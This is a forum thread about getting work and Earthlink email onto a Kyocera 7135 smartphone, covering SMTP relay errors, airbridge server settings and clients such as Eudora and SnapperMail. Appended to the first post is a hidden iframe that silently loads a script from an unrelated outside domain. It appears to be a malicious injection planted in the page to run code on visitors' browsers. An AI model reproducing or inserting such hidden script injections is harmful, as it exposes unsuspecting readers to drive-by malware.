This could be a lame question.....How do I get my work e-mail forwarded to this phone if I am out of the office? And how do you set up the phone to send out e-mail with my work e-mail address as the sender???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
You don't want to forward the email. Just close your mail applicaiton on your PC, and use the phone to check it while you are away.
Just like your email application on your PC pulls the email from the server, so can the 7135. You need the following:
Data services on your account for the 7135 (CSD or PPP)
An understanding of where your mail servers are. If they are for work, they may be behind a firewall. If this is the case, you probably need to dial into your network directly on the 7135 (CSD call ), or you can VPN over the 1xRTT connection (PPP).
Mail server name
Mail account username
Mail account password
Know how to setup a mail client with all these settings and create dial in connections
A lot of people swear on this functionality of the smartphones, god knows its the biggest thing I use mine for. FOr some people, it's not easy to setup.
I am having trouble sending e mail from my phone! I don't have a corp. firewall just an account through earthlink...When I send messages I get an error that says:
An address has an error relaying to xxx@xxx.com: prohibited by administrator.
I am using eudora
Do any of you experts have suggestions for a newbie?

Earthlink won't let you send through their smtp server unless you are connected to their network, even with authentication.
If you are connecting to the internet through Express Network or QNC, change your SMTP server to mail.airbridge.net with no logon or password and you will be able to send email from a QNC or Express Network connection (although not if you you dial into Earthlink or another ISP...).
Alan is right. It works fine after dialing into Earthlink. Are you sure you are dialing to earthlink and not using QNC? If you are doing the latter, you'lll need to use airbridge. That is what I usually do since I only have 100 dial-up minutes on my Earthlink DSL account.
How are you connecting? Express Network, QNC, or dialing into Earthlink?
In Eudora, go to edit the mail account, and tell me what you have entered on the Basic tab under Outgoing Server(SMTP).
Go to the Security tab, and under the Outgoing (SMTP) section, tell me what the two drop down boxes say for Authentication.
Are you having this problem with any outgoing email address, or have you only tried one particular address?
If you want me to test and make sure it is not a problem with a particular address, you can PM me with the email address you are trying to send to and I will try from my phone.
Neither Mobile Mail nor Eudora that come with the 7135 seem to be able to do automatic mail retrieval at set intervals. Is this correct? Am I missing something? Is there another email client that I should be aware of? Thanks
Has anyone else tried SnapperMail on their 7135 yet? I could not get the automatic retrieval to work, either with a connection already established and the cover open or with the cover closed (which I suspect may be an issue). Probably a configuration problem on my end, and I gave up pretty quickly since it is not a priority for me.
Originally posted by alenzini I just tested it. The SMTP server requires authentication. Use the same login and password that you use for POP3.
Note: I tested this off of the Verizon network. It may be that it only requires authentication when you are off network.

That's odd. It works from my 7135 without authentication. Maybe it varies by market (I assume I am assigned a different IP address based on where I originate my call, and the server may be set to only allow non-authenticated connections from some IP addresses... That's how the mail server I run works).
Airbridge is not too secure if it will accept ANY user name and password..... I guess it stops the casual hackers and spambots.
Been looking at quite a few options for e-mail, althought I can't get my IT department to give me mailserver/proxy info, so I have yet to try anything yet. Why is it that IT guys are so territorial???
Here is what I am considering:
Snapper mail
Wireless Knowledge
Notify Link (no demo available )
Inbox to Go
Multi Mail
I want something with 'push' or push-type technology that will check every 5-15 minutes and notify me.
I also want something that will leave copies of sent mail in my desktop/outlook e-mail (for documentation purposes, etc.).
The prices seem to vary, from one time only charges, to yearly fees.
If anyone can chime in on any of the above if you have had personal experience it would be apprecited.
I have been scouring the various websites and doing searches here too that have pointed me in some new directions.
Thanks in advance to all.
Jeff
